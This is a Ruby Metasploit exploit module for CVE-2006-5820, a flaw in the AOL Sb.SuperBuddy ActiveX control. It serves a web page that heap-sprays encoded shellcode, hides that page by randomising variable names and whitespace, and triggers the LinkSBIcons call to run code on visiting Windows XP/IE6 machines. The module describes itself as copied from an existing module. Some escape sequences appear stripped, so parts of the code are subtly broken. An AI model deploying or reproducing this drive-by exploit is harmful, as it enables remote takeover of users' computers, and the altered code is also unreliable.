No description provided by source.
require \'msf/core\'
module Msf
class Exploits::Windows::Browser::AOL_SuperBuddy_LinkSBIcons < Msf::Exploit::Remote
include Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
\'Name\' => \'AOL Sb.Superbuddy vulnerability\',
\'Description\' => %q{
This module exploits a flaw in AOL Sb.SuperBuddy. We stole this code from a pre-existing metasploit module.
},
\'License\' => MSF_LICENSE,
\'Author\' =>
[
\'kradchad\',
\'leetpete\'
],
\'Version\' => \'0.1\',
\'References\' =>
[
[ \'CVE\', \'CVE-2006-5820\']
],
\'Payload\' =>
{
\'Space\' => 1024,
\'BadChars\' => \"x00\",
},
\'Platform\' => \'win\',
\'Targets\' =>
[
[\'Windows XP SP0-SP2 / IE 6.0SP1 English\', {\'Ret\' => 0x0c0c0c0c} ]
],
\'DefaultTarget\' => 0))
end
def autofilter
false
end
def on_request_uri(cli, request)
# Re-generate the payload
return if ((p = regenerate_payload(cli)) == nil)
# Encode the shellcode
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
# Get a unicode friendly version of the return address
addr_word = [target.ret].pack(\'V\').unpack(\'H*\')[0][0,4]
# Randomize the javascript variable names
var_buffer = rand_text_alpha(rand(30)+2)
var_shellcode = rand_text_alpha(rand(30)+2)
var_unescape = rand_text_alpha(rand(30)+2)
var_x = rand_text_alpha(rand(30)+2)
var_i = rand_text_alpha(rand(30)+2)
var_tic = rand_text_alpha(rand(30)+2)
var_toc = rand_text_alpha(rand(30)+2)
# Randomize HTML data
html = rand_text_alpha(rand(30)+2)
# Build out the message
content = %Q|
<html>
<head>
<script>
try {
var #{var_unescape} = unescape ;
var #{var_shellcode} = #{var_unescape}( \"#{shellcode}\" ) ;
var #{var_buffer} = #{var_unescape}( \"%u#{addr_word}\" ) ;
while (#{var_buffer}.length <= 0x100000) #{var_buffer}+=#{var_buffer} ;
var #{var_x} = new Array() ;
for ( var #{var_i} =0 ; #{var_i} < 120 ; #{var_i}++ ) {
#{var_x}[ #{var_i} ] =
#{var_buffer}.substring( 0 , 0x100000 - #{var_shellcode}.length ) + #{var_shellcode} ;
}
var #{var_tic} = new ActiveXObject( \'Sb.SuperBuddy.1\' );
try { #{var_tic}.LinkSBIcons( #{target.ret} ) ; } catch( e ) { }
} catch( e ) { window.location = \'about:blank\' ; }
</script>
</head>
<body>
#{html}
</body>
</html>
|
# Randomize the whitespace in the document
content.gsub!(/s+/) do |s|
len = rand(100)+2
set = \"x09x20x0dx0a\"
buf = \'\'
while (buf.length < len)
buf << set[rand(set.length)].chr
end
buf
end
print_status(\"Sending exploit to #{cli.peerhost}:#{cli.peerport}...\")
# Transmit the response to the client
send_response_html(cli, content)
end
end
end